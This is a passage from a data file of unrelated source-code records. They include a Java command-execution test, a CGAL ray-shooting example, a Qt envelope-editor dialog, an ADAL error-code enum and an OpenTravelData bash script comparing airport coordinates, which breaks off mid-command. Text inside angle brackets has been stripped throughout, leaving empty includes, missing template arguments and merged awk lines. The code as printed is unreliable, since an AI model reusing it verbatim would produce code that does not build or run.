testCmdExecFailed() {\n\t\tfinal String PUI = \"XYZ123abc456\";\n\t\tfinal List commandList = new ArrayList();\n\t\t\n\t\tif (cmdProcessBuilder.isUNIXLinux()) {\n\t\t Assert.assertEquals(cmdProcessBuilder.checkOSPlatform(), \"Linux\");\n\t\t commandList.add(System.getProperty(\"ExecLimitManagerScript\") + \" \" + PUI);\n\t\t} else if (cmdProcessBuilder.isMacOS()) {\n\t\t commandList.add(System.getProperty(\"ExecLimitManagerScript\") + \" \" + PUI);\n\t\t}\n\t\t\n\t\tif (cmdProcessBuilder.isMacOS() || cmdProcessBuilder.isUNIXLinux()) {\n\t\t Assert.assertFalse(cmdProcessBuilder.execMultipleCommands(\"/wrong/path/\", commandList));\n\t\t}\n\t}\n\t\n}\n"} {"text": "//! \\file examples/Arrangement_on_surface_2/ex_vertical_ray_shooting.cpp\n// Answering vertical ray-shooting queries.\n\n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \"point_location_utils.h\"\n\ntypedef CGAL::MP_Float Number_type;\ntypedef CGAL::Cartesian Kernel;\ntypedef CGAL::Arr_segment_traits_2 Traits_2;\ntypedef Traits_2::Point_2 Point_2;\ntypedef CGAL::Arrangement_2 Arrangement_2;\ntypedef CGAL::Arr_walk_along_line_point_location Walk_pl;\ntypedef CGAL::Arr_trapezoid_ric_point_location Trap_pl;\n\nint main ()\n{\n // Construct the arrangement.\n Arrangement_2 arr;\n Walk_pl walk_pl (arr);\n Trap_pl trap_pl;\n\n construct_segments_arr (arr);\n\n // Perform some vertical ray-shooting queries using the walk strategy.\n Point_2 q1 (1, 4);\n Point_2 q2 (4, 3);\n Point_2 q3 (6, 3);\n\n vertical_ray_shooting_query (walk_pl, q1);\n vertical_ray_shooting_query (walk_pl, q2);\n vertical_ray_shooting_query (walk_pl, q3);\n\n // Attach the trapezoid-RIC object to the arrangement and perform queries.\n Point_2 q4 (3, 2);\n Point_2 q5 (5, 2);\n Point_2 q6 (1, 0);\n\n trap_pl.attach (arr);\n vertical_ray_shooting_query (trap_pl, q4);\n vertical_ray_shooting_query (trap_pl, q5);\n vertical_ray_shooting_query (trap_pl, q6);\n\n return 0;\n}\n"} {"text": "#include \"fm_envelope_set_edit_dialog.hpp\"\n#include \"ui_fm_envelope_set_edit_dialog.h\"\n#include \n\nFMEnvelopeSetEditDialog::FMEnvelopeSetEditDialog(std::vector set, QWidget *parent) :\n\tQDialog(parent),\n\tui(new Ui::FMEnvelopeSetEditDialog)\n{\n\tui->setupUi(this);\n\n\tsetWindowFlags(windowFlags() ^ Qt::WindowContextHelpButtonHint);\n\n\tfor (size_t i = 0; i < set.size(); ++i) {\n\t\tinsertRow(static_cast(i), set.at(i));\n\t}\n}\n\nFMEnvelopeSetEditDialog::~FMEnvelopeSetEditDialog()\n{\n\tdelete ui;\n}\n\nstd::vector FMEnvelopeSetEditDialog::getSet()\n{\n\tstd::vector set;\n\tfor (int i = 0; i < ui->treeWidget->topLevelItemCount(); ++i) {\n\t\tset.push_back(static_cast(\n\t\t\t\t\t\t qobject_cast(ui->treeWidget->itemWidget(\n\t\t\t\t\t\t\t\t\t\t\t\t\t ui->treeWidget->topLevelItem(i), 1))->currentData().toInt()));\n\t}\n\treturn set;\n}\n\nvoid FMEnvelopeSetEditDialog::swapset(int aboveRow, int belowRow)\n{\n\tauto* tree = ui->treeWidget;\n\tQComboBox* belowBox = makeCombobox();\n\tbelowBox->setCurrentIndex(qobject_cast(tree->itemWidget(tree->topLevelItem(belowRow), 1))->currentIndex());\n\tQTreeWidgetItem* below = tree->takeTopLevelItem(belowRow);\n\tif (tree->topLevelItemCount() > 2) {\n\t\tQComboBox* aboveBox = makeCombobox();\n\t\taboveBox->setCurrentIndex(qobject_cast(tree->itemWidget(tree->topLevelItem(aboveRow), 1))->currentIndex());\n\t\tQTreeWidgetItem* above = tree->takeTopLevelItem(aboveRow);\n\t\ttree->insertTopLevelItem(aboveRow, below);\n\t\ttree->insertTopLevelItem(belowRow, above);\n\t\ttree->setItemWidget(below, 1, belowBox);\n\t\ttree->setItemWidget(above, 1, aboveBox);\n\t}\n\telse {\n\t\ttree->insertTopLevelItem(aboveRow, below);\n\t\ttree->setItemWidget(below, 1, belowBox);\n\t}\n\n\tif (!aboveRow || !belowRow) alignTreeOn1stItemChanged();\t// Dummy set and delete to align\n\n\tfor (int i = aboveRow; i < ui->treeWidget->topLevelItemCount(); ++i) {\n\t\tui->treeWidget->topLevelItem(i)->setText(0, QString::number(i));\n\t}\n}\n\nvoid FMEnvelopeSetEditDialog::insertRow(int row, FMEnvelopeTextType type)\n{\n\tif (row == -1) row = 0;\n\tauto item = new QTreeWidgetItem();\n\titem->setText(0, QString::number(row));\n\tQComboBox* box = makeCombobox();\n\tfor (int i = 0; i < box->count(); ++i) {\n\t\tif (static_cast(box->itemData(i).toInt()) == type) {\n\t\t\tbox->setCurrentIndex(i);\n\t\t\tbreak;\n\t\t}\n\t}\n\tui->treeWidget->insertTopLevelItem(row, item);\n\tui->treeWidget->setItemWidget(item, 1, box);\n\n\tif (!row) alignTreeOn1stItemChanged();\t// Dummy set and delete to align\n\n\tfor (int i = row + 1; i < ui->treeWidget->topLevelItemCount(); ++i) {\n\t\tui->treeWidget->topLevelItem(i)->setText(0, QString::number(i));\n\t}\n}\n\nQComboBox* FMEnvelopeSetEditDialog::makeCombobox()\n{\n\tauto box = new QComboBox();\n\tbox->addItem(tr(\"Skip\"), static_cast(FMEnvelopeTextType::Skip));\n\tbox->addItem(\"AL\", static_cast(FMEnvelopeTextType::AL));\n\tbox->addItem(\"FB\", static_cast(FMEnvelopeTextType::FB));\n\tbox->addItem(\"AR1\", static_cast(FMEnvelopeTextType::AR1));\n\tbox->addItem(\"DR1\", static_cast(FMEnvelopeTextType::DR1));\n\tbox->addItem(\"SR1\", static_cast(FMEnvelopeTextType::SR1));\n\tbox->addItem(\"RR1\", static_cast(FMEnvelopeTextType::RR1));\n\tbox->addItem(\"SL1\", static_cast(FMEnvelopeTextType::SL1));\n\tbox->addItem(\"TL1\", static_cast(FMEnvelopeTextType::TL1));\n\tbox->addItem(\"KS1\", static_cast(FMEnvelopeTextType::KS1));\n\tbox->addItem(\"ML1\", static_cast(FMEnvelopeTextType::ML1));\n\tbox->addItem(\"DT1\", static_cast(FMEnvelopeTextType::DT1));\n\tbox->addItem(\"AR2\", static_cast(FMEnvelopeTextType::AR2));\n\tbox->addItem(\"DR2\", static_cast(FMEnvelopeTextType::DR2));\n\tbox->addItem(\"SR2\", static_cast(FMEnvelopeTextType::SR2));\n\tbox->addItem(\"RR2\", static_cast(FMEnvelopeTextType::RR2));\n\tbox->addItem(\"SL2\", static_cast(FMEnvelopeTextType::SL2));\n\tbox->addItem(\"TL2\", static_cast(FMEnvelopeTextType::TL2));\n\tbox->addItem(\"KS2\", static_cast(FMEnvelopeTextType::KS2));\n\tbox->addItem(\"ML2\", static_cast(FMEnvelopeTextType::ML2));\n\tbox->addItem(\"DT2\", static_cast(FMEnvelopeTextType::DT2));\n\tbox->addItem(\"AR3\", static_cast(FMEnvelopeTextType::AR3));\n\tbox->addItem(\"DR3\", static_cast(FMEnvelopeTextType::DR3));\n\tbox->addItem(\"SR3\", static_cast(FMEnvelopeTextType::SR3));\n\tbox->addItem(\"RR3\", static_cast(FMEnvelopeTextType::RR3));\n\tbox->addItem(\"SL3\", static_cast(FMEnvelopeTextType::SL3));\n\tbox->addItem(\"TL3\", static_cast(FMEnvelopeTextType::TL3));\n\tbox->addItem(\"KS3\", static_cast(FMEnvelopeTextType::KS3));\n\tbox->addItem(\"ML3\", static_cast(FMEnvelopeTextType::ML3));\n\tbox->addItem(\"DT3\", static_cast(FMEnvelopeTextType::DT3));\n\tbox->addItem(\"AR4\", static_cast(FMEnvelopeTextType::AR4));\n\tbox->addItem(\"DR4\", static_cast(FMEnvelopeTextType::DR4));\n\tbox->addItem(\"SR4\", static_cast(FMEnvelopeTextType::SR4));\n\tbox->addItem(\"RR4\", static_cast(FMEnvelopeTextType::RR4));\n\tbox->addItem(\"SL4\", static_cast(FMEnvelopeTextType::SL4));\n\tbox->addItem(\"TL4\", static_cast(FMEnvelopeTextType::TL4));\n\tbox->addItem(\"KS4\", static_cast(FMEnvelopeTextType::KS4));\n\tbox->addItem(\"ML4\", static_cast(FMEnvelopeTextType::ML4));\n\tbox->addItem(\"DT4\", static_cast(FMEnvelopeTextType::DT4));\n\treturn box;\n}\n\n/// Dummy set and delete to align\nvoid FMEnvelopeSetEditDialog::alignTreeOn1stItemChanged()\n{\n\tauto tmp = new QTreeWidgetItem();\n\tui->treeWidget->insertTopLevelItem(1, tmp);\n\tdelete ui->treeWidget->takeTopLevelItem(1);\n}\n\nvoid FMEnvelopeSetEditDialog::on_upToolButton_clicked()\n{\n\tint curRow = ui->treeWidget->currentIndex().row();\n\tif (!curRow) return;\n\n\tswapset(curRow - 1, curRow);\n\tui->treeWidget->setCurrentItem(ui->treeWidget->topLevelItem(curRow - 1));\n}\n\nvoid FMEnvelopeSetEditDialog::on_downToolButton_clicked()\n{\n\tint curRow = ui->treeWidget->currentIndex().row();\n\tif (curRow == ui->treeWidget->topLevelItemCount() - 1) return;\n\n\tswapset(curRow, curRow + 1);\n\tui->treeWidget->setCurrentItem(ui->treeWidget->topLevelItem(curRow + 1));\n}\n\nvoid FMEnvelopeSetEditDialog::on_addPushButton_clicked()\n{\n\tint row = ui->treeWidget->currentIndex().row();\n\tinsertRow(row, FMEnvelopeTextType::Skip);\n\n\tui->treeWidget->setCurrentItem(ui->treeWidget->topLevelItem((row == -1) ? 0 : row));\n\tui->upToolButton->setEnabled(true);\n\tui->downToolButton->setEnabled(true);\n\tui->removePushButton->setEnabled(true);\n}\n\nvoid FMEnvelopeSetEditDialog::on_removePushButton_clicked()\n{\n\tint row = ui->treeWidget->currentIndex().row();\n\tdelete ui->treeWidget->takeTopLevelItem(row);\n\n\tfor (int i = row; i < ui->treeWidget->topLevelItemCount(); ++i) {\n\t\tui->treeWidget->topLevelItem(i)->setText(0, QString::number(i));\n\t}\n\n\tif (!ui->treeWidget->topLevelItemCount()) {\n\t\tui->upToolButton->setEnabled(false);\n\t\tui->downToolButton->setEnabled(false);\n\t\tui->removePushButton->setEnabled(false);\n\t}\n}\n\nvoid FMEnvelopeSetEditDialog::on_treeWidget_itemSelectionChanged()\n{\n\tif (ui->treeWidget->currentIndex().row() == -1) {\n\t\tui->upToolButton->setEnabled(false);\n\t\tui->downToolButton->setEnabled(false);\n\t\tui->removePushButton->setEnabled(false);\n\t}\n\telse {\n\t\tui->upToolButton->setEnabled(true);\n\t\tui->downToolButton->setEnabled(true);\n\t\tui->removePushButton->setEnabled(true);\n\t}\n}\n"} {"text": "// Copyright © Microsoft Open Technologies, Inc.\n//\n// All Rights Reserved\n//\n// Licensed under the Apache License, Version 2.0 (the \"License\");\n// you may not use this file except in compliance with the License.\n// You may obtain a copy of the License at\n//\n// http://www.apache.org/licenses/LICENSE-2.0\n//\n// THIS CODE IS PROVIDED *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS\n// OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION\n// ANY IMPLIED WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A\n// PARTICULAR PURPOSE, MERCHANTABILITY OR NON-INFRINGEMENT.\n//\n// See the Apache License, Version 2.0 for the specific language\n// governing permissions and limitations under the License.\n\n/*! The class contains an incrementally expanding list of errors */\ntypedef enum\n{\n /*! No error occurred. The value is added to make easier usage of functions that take error code,\n but no error condition occurred.*/\n AD_ERROR_SUCCEEDED = 0,\n \n /*! The user has cancelled the applicable UI prompts */\n AD_ERROR_USER_CANCEL = 1,\n \n /*! The method call contains one or more invalid arguments */\n AD_ERROR_INVALID_ARGUMENT = 2,\n \n /*! HTTP 401 (Unauthorized) response does not contain the OAUTH2 required header */\n AD_ERROR_MISSING_AUTHENTICATE_HEADER = 3,\n \n /*! HTTP 401 (Unauthorized) response's authentication header is in invalid format\n or does not contain expected values. */\n AD_ERROR_AUTHENTICATE_HEADER_BAD_FORMAT = 4,\n \n /*! An internal error occurs when the library did not receive\n a response from the server */\n AD_ERROR_CONNECTION_MISSING_RESPONSE = 5,\n \n /*! The logic expects the server to return HTTP_UNAUTHORIZED */\n AD_ERROR_UNAUTHORIZED_CODE_EXPECTED = 6,\n \n /*! The refresh token cannot be used for extracting an access token. */\n AD_ERROR_INVALID_REFRESH_TOKEN = 7,\n \n /*! An unexpected internal error occurred. */\n AD_ERROR_UNEXPECTED = 8,\n \n /*! Access tokens for multiple users exist in the token cache. Please specify the userId. */\n AD_ERROR_MULTIPLE_USERS = 9,\n \n /*! User needs to re-authorize resource usage. This error is raised when access token cannot \n be obtained without user explicitly re-authorizing, but the developer has called \n acquireTokenSilentWithResource method. To obtain the token, the application will need to call\n acquireTokenWithResource after this error to allow the library to give user abitlity\n to re-authorize (with web UI involved). */\n AD_ERROR_USER_INPUT_NEEDED = 10,\n \n /*! The cache store cannot be persisted to the specified location. This error is raised only if\n the application called explicitly to persist the cache. Else, the errors are only logged\n as warnings. */\n AD_ERROR_CACHE_PERSISTENCE = 11,\n \n /*! An issue occurred while attempting to read the persisted token cache store. */\n AD_ERROR_BAD_CACHE_FORMAT = 12,\n \n /*! The user is currently prompted for another authentication. The library chose to raise this\n error instead of waiting to avoid multiple sequential prompts. It is up to the application\n developer to chose to retry later. */\n AD_ERROR_USER_PROMPTED = 13,\n \n /*! This type of error occurs when something went wrong with the application stack, e.g.\n the resource bundle cannot be loaded. */\n AD_ERROR_APPLICATION = 14,\n \n /*! A generic error code for all of the authentication errors. */\n AD_ERROR_AUTHENTICATION = 15,\n \n /*! An error was raised during the process of validating the authorization authority. */\n AD_ERROR_AUTHORITY_VALIDATION = 16,\n \n /*! Failed to extract the main view controller of the application. Make sure that the application\n has UI elements.*/\n AD_ERROR_NO_MAIN_VIEW_CONTROLLER = 17,\n \n /*! Failed to extract the framework resources (e.g. storyboards). Please read the readme and documentation\n for the library on how to link the ADAL library with its resources to your project.*/\n AD_ERROR_MISSING_RESOURCES = 18,\n \n /*! Token requested for user A, but obtained for user B. This can happen if the user explicitly authenticated\n as user B in the login UI, or if cookies for user B are already present.*/\n AD_ERROR_WRONG_USER = 19,\n \n /*! When client authentication is requested by TLS, the library attempts to extract the authentication\n certificate. The error is generated if more than one certificate is found in the keychain. */\n AD_ERROR_MULTIPLE_TLS_CERTIFICATES = 20,\n \n /*! When the hash of the decrypted broker response does not match the hash returned from broker. */\n AD_ERROR_BROKER_RESPONSE_HASH_MISMATCH = 21,\n \n /*! When the application waiting for broker is activated without broker response. */\n AD_ERROR_BROKER_RESPONSE_NOT_RECEIVED = 22,\n \n /*! When work place join is required by the service. */\n AD_ERROR_WPJ_REQUIRED = 23,\n \n /*! The redirect URI cannot be used for invoking broker. */\n AD_ERROR_INVALID_REDIRECT_URI = 23,\n \n /*! The error code was not sent to us due to an older version of the broker */\n AD_ERROR_BROKER_UNKNOWN = 24,\n \n /*! Server redirects authentication process to a non-https url */\n AD_ERROR_NON_HTTPS_REDIRECT = 25\n \n} ADErrorCode;\n\n/* HTTP status codes used by the library */\ntypedef enum\n{\n HTTP_UNAUTHORIZED = 401,\n} HTTPStatusCodes;"} {"text": "-DGMENU_I_KNOW_THIS_IS_UNSTABLE\n"} {"text": "#!/bin/bash\n\n#\n# OpenTravelData (OPTD) utility\n# Git repository:\n# https://github.com/opentraveldata/opentraveldata/tree/master/tools\n#\n\n#\n# Four parameters are optional for this script:\n# - the Geonames data dump file, only for its geographical coordinates\n# - the OPTD-maintained list of \"best known\" POR (points of reference)\n# - the OPTD-maintained list of POR importance (i.e., PageRank) figures\n# - the minimal distance (in km) triggering a difference\n#\n\n##\n# GNU tools, including on MacOS\nsource setGnuTools.sh || exit -1\n\n##\n# Directories\nsource setDirs.sh \"$0\" || exit -1\n\n##\n# Log level\nLOG_LEVEL=3\n\n##\n# Data path\nOPTD_DIR=\"${EXEC_PATH}../\"\nDATA_DIR=\"${OPTD_DIR}opentraveldata/\"\n\n##\n# Geonames data dump file\nGEONAME_FILE_RAW_FILENAME=\"dump_from_geonames.csv\"\nGEONAME_FILENAME=\"wpk_${GEONAME_FILE_RAW_FILENAME}\"\nGEONAME_FILE_SORTED=\"sorted_${GEONAME_FILENAME}\"\nGEONAME_FILE_SORTED_CUT=\"cut_${GEONAME_FILE_SORTED}\"\n#\nGEONAME_FILE_RAW=\"${TMP_DIR}${GEONAME_FILE_RAW_FILENAME}\"\nGEONAME_FILE=\"${TMP_DIR}${GEONAME_FILENAME}\"\n\n##\n# OPTD-maintained list of \"best known\" POR (points of reference)\nOPTD_BEST_FILENAME=\"optd_por_best_known_so_far.csv\"\n#\nOPTD_BEST_FILE=\"${DATA_DIR}${OPTD_BEST_FILENAME}\"\n\n##\n# OPTD-maintained list of POR importance (i.e., PageRank) figures\nAIRPORT_PR_FILENAME=\"ref_airport_pageranked.csv\"\nAIRPORT_PR_SORTED=\"sorted_${AIRPORT_PR_FILENAME}\"\nAIRPORT_PR_SORTED_CUT=\"cut_sorted_${AIRPORT_PR_FILENAME}\"\n#\nAIRPORT_PR_FILE=\"${DATA_DIR}${AIRPORT_PR_FILENAME}\"\n\n##\n# Comparison files\nPOR_MAIN_DIFF_FILENAME=\"optd_por_diff_w_geonames.csv\"\n#\nPOR_MAIN_DIFF=\"${DATA_DIR}${POR_MAIN_DIFF_FILENAME}\"\n\n# Minimal distance triggering a difference (in km)\nCOMP_MIN_DIST=10\n\n##\n# Missing POR\nGEONAME_FILE_MISSING=\"${GEONAME_FILE}.missing\"\nOPTD_BEST_FILE_MISSING=\"${OPTD_BEST_FILE}.missing\"\n\n\n##\n# Temporary files\nOPTD_BEST_WITH_NOHD=\"${TMP_DIR}${OPTD_BEST_FILENAME}.wohd\"\nGEO_COMBINED_TMP_FILE=\"geo_combined_file.csv.tmp\"\n\n\n##\n# Usage helper\n#\nif [ \"$1\" = \"-h\" -o \"$1\" = \"--help\" ]\nthen\n\techo\n\techo \"Usage: $0 [ [ [] []]]]\"\n\techo \" - Default name for the Geonames data dump file: '${GEONAME_FILE_RAW}'\"\n\techo \" - Default name for the OPTD-maintained file of best known coordinates: '${OPTD_BEST_FILE}'\"\n\techo \" - Default name for the PageRanked POR file: '${AIRPORT_PR_FILE}'\"\n\techo \" - Default minimum distance (in km) triggering a difference: '${COMP_MIN_DIST}'\"\n\techo\n\texit\nfi\n\n\n##\n# Cleaning\n#\nif [ \"$1\" = \"--clean\" ]\nthen\n\tif [ \"${TMP_DIR}\" = \"/tmp/por/\" ]\n\tthen\n\t\t\\rm -rf ${TMP_DIR}\n\telse\n\t\t\\rm -f ${GEONAME_FILE_MISSING} ${OPTD_BEST_FILE_MISSING} \\\n\t\t\t${OPTD_BEST_FILE_HEADER} ${OPTD_BEST_WITH_NOHD} \\\n\t\t\t${GEONAME_FILE} ${GEONAME_FILE_SORTED} ${GEONAME_FILE_SORTED_CUT} \\\n\t\t\t${AIRPORT_PR_SORTED} ${AIRPORT_PR_SORTED_CUT}\n\tfi\n\texit\nfi\n\n\n##\n# Local helper scripts\nPREPARE_EXEC=\"bash ${EXEC_PATH}prepare_geonames_dump_file.sh\"\nPREPARE_POP_EXEC=\"bash ${EXEC_PATH}prepare_popularity.sh\"\nPREPARE_PR_EXEC=\"bash ${EXEC_PATH}prepare_pagerank.sh\"\nCOMPARE_EXEC=\"bash ${EXEC_PATH}compare_geo_files.sh\"\n\n\n##\n# Geonames data dump file\nif [ \"$1\" != \"\" ]\nthen\n\tGEONAME_FILE_RAW=$1\n\tGEONAME_FILE_RAW_FILENAME=`basename ${GEONAME_FILE_RAW}`\n\tGEONAME_FILENAME=wpk_${GEONAME_FILE_RAW_FILENAME}\n\tGEONAME_FILE_SORTED=sorted_${GEONAME_FILENAME}\n\tGEONAME_FILE_SORTED_CUT=cut_${GEONAME_FILE_SORTED}\n\tif [ \"${GEONAME_FILE_RAW}\" = \"${GEONAME_FILE_RAW_FILENAME}\" ]\n\tthen\n\t\tGEONAME_FILE_RAW=\"${TMP_DIR}${GEONAME_FILE_RAW_FILENAME}\"\n\tfi\nfi\nGEONAME_FILE=\"${TMP_DIR}${GEONAME_FILENAME}\"\nGEONAME_FILE_SORTED=\"${TMP_DIR}${GEONAME_FILE_SORTED}\"\nGEONAME_FILE_SORTED_CUT=\"${TMP_DIR}${GEONAME_FILE_SORTED_CUT}\"\n\nif [ ! -f \"${GEONAME_FILE_RAW}\" ]\nthen\n\techo\n\techo \"[$0:$LINENO] The '${GEONAME_FILE_RAW}' file does not exist.\"\n\tif [ \"$1\" = \"\" ];\n\tthen\n\t\t${PREPARE_EXEC} --geonames\n\t\techo \"The default name of the Geonames data dump copy is '${GEONAME_FILE_RAW}'.\"\n\t\techo\n\tfi\n\texit -1\nfi\n\n\n##\n# Prepare the Geonames dump file, downloaded from Geonames and pre-processed.\n# Basically, a primary key is added and the coordinates are extracted,\n# in order to keep a data file with only four fields/columns:\n# * The primary key (IATA code - location type)\n# * The airport/city code\n# * The geographical coordinates.\n${PREPARE_EXEC} ${OPTD_DIR} ${LOG_LEVEL}\n\n\n# OPTD-maintained list of \"best known\" geographical coordinates\nif [ \"$2\" != \"\" ]\nthen\n\tOPTD_BEST_FILE=\"$2\"\nfi\n\nif [ ! -f \"${OPTD_BEST_FILE}\" ]\nthen\n\techo\n\techo \"[$0:$LINENO] The '${OPTD_BEST_FILE}' file does not exist.\"\n\tif [ \"$2\" = \"\" ]\n\tthen\n\t\techo\n\t\techo \"Hint:\"\n\t\techo \"\\cp -f ${EXEC_PATH}../OPTD/${OPTD_BEST_FILENAME} ${TMP_DIR}\"\n\t\techo\n\tfi\n\texit -1\nfi\n\n\n##\n# Data file of PageRanked POR\nif [ \"$3\" != \"\" ]\nthen\n\tAIRPORT_PR_FILE=$3\n\tAIRPORT_PR_FILENAME=`basename ${AIRPORT_PR_FILE}`\n\tAIRPORT_PR_SORTED=sorted_${AIRPORT_PR_FILENAME}\n\tAIRPORT_PR_SORTED_CUT=cut_${AIRPORT_PR_SORTED}\n\tif [ \"${AIRPORT_PR_FILE}\" = \"${AIRPORT_PR_FILENAME}\" ]\n\tthen\n\t\tAIRPORT_PR_FILE=\"${TMP_DIR}${AIRPORT_PR_FILENAME}\"\n\tfi\nfi\nAIRPORT_PR_SORTED=${TMP_DIR}${AIRPORT_PR_SORTED}\nAIRPORT_PR_SORTED_CUT=${TMP_DIR}${AIRPORT_PR_SORTED_CUT}\n\nif [ ! -f \"${AIRPORT_PR_FILE}\" ]\nthen\n\techo\n\techo \"[$0:$LINENO] The '${AIRPORT_PR_FILE}' file does not exist.\"\n\tif [ \"$3\" = \"\" ]\n\tthen\n\t\t${PREPARE_PR_EXEC} --popularity\n\t\techo \"The default name of the airport popularity copy is '${AIRPORT_PR_FILE}'.\"\n\t\techo\n\tfi\n\texit -1\nfi\n\n\n##\n# Prepare the OPTD-maintained airport popularity dump file. Basically, the file\n# is sorted by IATA code. Then, only two columns/fields are kept in that\n# version of the file: the airport/city IATA code and the airport popularity.\n${PREPARE_PR_EXEC} ${AIRPORT_PR_FILE}\n\n\n##\n# Minimal distance (in km) triggering a difference\nif [ \"$4\" != \"\" ]\nthen\n\tCOMP_MIN_DIST=$4\nfi\n\n##\n# Extract the header into a temporary file\nOPTD_BEST_FILE_HEADER=${OPTD_BEST_FILE}.tmp.hdr\ngrep -E \"^pk(.+)\" ${OPTD_BEST_FILE} > ${OPTD_BEST_FILE_HEADER}\n\n# Remove the header\n${SED_TOOL} -E \"s/^pk(.+)//g\" ${OPTD_BEST_FILE} > ${OPTD_BEST_WITH_NOHD}\n${SED_TOOL} -i\"\" -E \"/^$/d\" ${OPTD_BEST_WITH_NOHD}\n\n##\n# The two files contain only four fields (the primary key, the IATA code and\n# both coordinates).\n#\n# Note that the ${PREPARE_EXEC} (e.g., prepare_geonames_dump_file.sh) script\n# prepares such a file for Geonames (named ${GEONAME_FILE_SORTED_CUT}, e.g.,\n# cut_sorted_wpk_dump_from_geonames.csv) from the data dump (named\n# ${GEONAME_FILE}, e.g., wpk_dump_from_geonames.csv).\n#\n# The 'join' command aggregates:\n# * The four fields of the (stripped) Geonames dump file.\n# That is the file #1 for the join command.\n# * The five fields of the file of best known coordinates (the primary key has\n# been stripped by the join command), i.e.:\n# * the IATA codes of both the POR and its served city\n# * the two geographical coordinates.\n# * the effective date (when empty, it means the POR has always existed).\n#\n# The 'join' command takes all the rows from the file #1 (Geonames dump file).\n# When there is no corresponding entry in the file of best coordinates, only\n# the four (extracted) fields of the Geonames dump file are kept.\n# Hence, lines may have:\n# * 9 fields: the primary key, IATA code and both coordinates of the Geonames\n# dump file, followed by the IATA codes of the POR and its served city,\n# as well as the best coordinates, ended by the from validity date.\n# * 4 fields: the primary key, IATA code and both coordinates of the Geonames\n# dump file.\n#\nGEONAME_MASTER=\"${GEO_COMBINED_TMP_FILE}.geomst\"\njoin -t'^' -a 1 -1 1 -2 1 -e NULL \\\n\t${GEONAME_FILE_SORTED_CUT} ${OPTD_BEST_WITH_NOHD} > ${GEONAME_MASTER}\n#echo \"head -3 ${GEONAME_FILE_SORTED_CUT} ${OPTD_BEST_WITH_NOHD} ${GEONAME_MASTER}\"\n\n\n##\n# Sanity check: calculate the minimal number of fields on the resulting file\n#\nMIN_FIELD_NB=`awk -F'^' 'BEGIN{n=10} {if (NF ${OPTD_BEST_MASTER}\n#echo \"head -3 ${GEONAME_FILE_SORTED_CUT} ${OPTD_BEST_WITH_NOHD} ${OPTD_BEST_MASTER}\"\n\n\n##\n# Sanity check: calculate the minimal number of fields on the resulting file\n#\nMIN_FIELD_NB=`awk -F'^' 'BEGIN{n=10} {if (NF ${GEONAME_MASTER}.dup\n#echo \"head -3 ${GEONAME_MASTER} ${GEONAME_MASTER}.dup\"\n\\mv -f ${GEONAME_MASTER}.dup ${GEONAME_MASTER}\ncut -d'^' -f 1-4 ${OPTD_BEST_MASTER} > ${OPTD_BEST_MASTER}.dup\n#echo \"head -3 ${OPTD_BEST_MASTER} ${OPTD_BEST_MASTER}.dup\"\n\\mv -f ${OPTD_BEST_MASTER}.dup ${OPTD_BEST_MASTER}\n\n\n##\n# Re-sort the files. Indeed, when there are duplicates (e.g., DUR/Durham),\n# the duplicated lines may not be in the sorting order, due to the coordinates\nsort ${GEONAME_MASTER} > ${GEONAME_MASTER}.dup\n\\mv -f ${GEONAME_MASTER}.dup ${GEONAME_MASTER}\nsort ${OPTD_BEST_MASTER} > ${OPTD_BEST_MASTER}.dup\n\\mv -f ${OPTD_BEST_MASTER}.dup ${OPTD_BEST_MASTER}\n\n\n##\n# Do some reporting\n#\n# Reminder:\n# * ${GEONAME_MASTER} (e.g., geo_combined_file.csv.tmp.geomst) has got all\n# the entries of the Geonames dump file (./wpk_dump_from_geonames.csv)\n# * ${OPTD_BEST_MASTER} (e.g., geo_combined_file.csv.tmp.bstmst) has got all\n# the entries of the OPTD-maintained list of best known geographical\n# coordinates (optd_por_best_known_so_far.csv)\n#\n#echo \"comm -12 ${GEONAME_MASTER} ${OPTD_BEST_MASTER} | less\"\n#echo \"comm -23 ${GEONAME_MASTER} ${OPTD_BEST_MASTER} | less\"\n#echo \"comm -13 ${GEONAME_MASTER} ${OPTD_BEST_MASTER} | less\"\nPOR_NB_COMMON=\"$(comm -12 ${GEONAME_MASTER} ${OPTD_BEST_MASTER} | ${WC_TOOL} -l)\"\nPOR_NB_FILE1=\"$(comm -23 ${GEONAME_MASTER} ${OPTD_BEST_MASTER} | ${WC_TOOL} -l)\"\nPOR_NB_FILE2=\"$(comm -13 ${GEONAME_MASTER} ${OPTD_BEST_MASTER} | ${WC_TOOL} -l)\"\necho\necho \"Reporting step\"\necho \"--------------\"\necho \"'${GEONAME_FILE}' and '${OPTD_BEST_FILE}' have got ${POR_NB_COMMON} common lines.\"\necho \"'${GEONAME_FILE}' has got ${POR_NB_FILE1} POR, missing from '${OPTD_BEST_FILE}'\"\necho \"'${OPTD_BEST_FILE}' has got ${POR_NB_FILE2} POR, missing from '${GEONAME_FILE}'\"\necho\n\nif [ ${POR_NB_FILE2} -gt 0 ]\nthen\n\tcomm -13 ${GEONAME_MASTER} ${OPTD_BEST_MASTER} > ${GEONAME_FILE_MISSING}\n\tPOR_MISSING_GEONAMES_NB=\"$(${WC_TOOL} -l ${GEONAME_FILE_MISSING} | cut -d' ' -f1)\"\n\techo\n\techo \"Suggestion step\"\n\techo \"---------------\"\n\techo \"${POR_MISSING_GEONAMES_NB} points of reference (POR) are missing from Geonames ('${GEONAME_FILE}').\"\n\techo \"They can be displayed with: less ${GEONAME_FILE_MISSING}\"\n\techo \"You may also want to launch the following script:\"\n\techo \"./generate_por_lists_for_geonames.sh\"\n\techo\nfi\n\nif [ ${POR_NB_FILE1} -gt 0 ]\nthen\n\tcomm -23 ${GEONAME_MASTER} ${OPTD_BEST_MASTER} > ${OPTD_BEST_FILE_MISSING}\n\tPOR_MISSING_BEST_NB=\"$(${WC_TOOL} -l ${OPTD_BEST_FILE_MISSING} | cut -d' ' -f1)\"\n\techo\n\techo \"Suggestion step\"\n\techo \"---------------\"\n\techo \"${POR_MISSING_BEST_NB} points of reference (POR) are missing from the file of best coordinates ('${OPTD_BEST_FILE}' => '${OPTD_BEST_WITH_NOHD}').\"\n\techo \"To incorporate the missing POR into '${OPTD_BEST_FILE}', just do:\"\n\techo \"cat ${OPTD_BEST_WITH_NOHD} ${OPTD_BEST_FILE_MISSING} | sort -t'^' -k1,1 > ${OPTD_BEST_FILE}.tmp && \\mv -f ${OPTD_BEST_FILE}.tmp ${OPTD_BEST_FILE} && \\rm -f 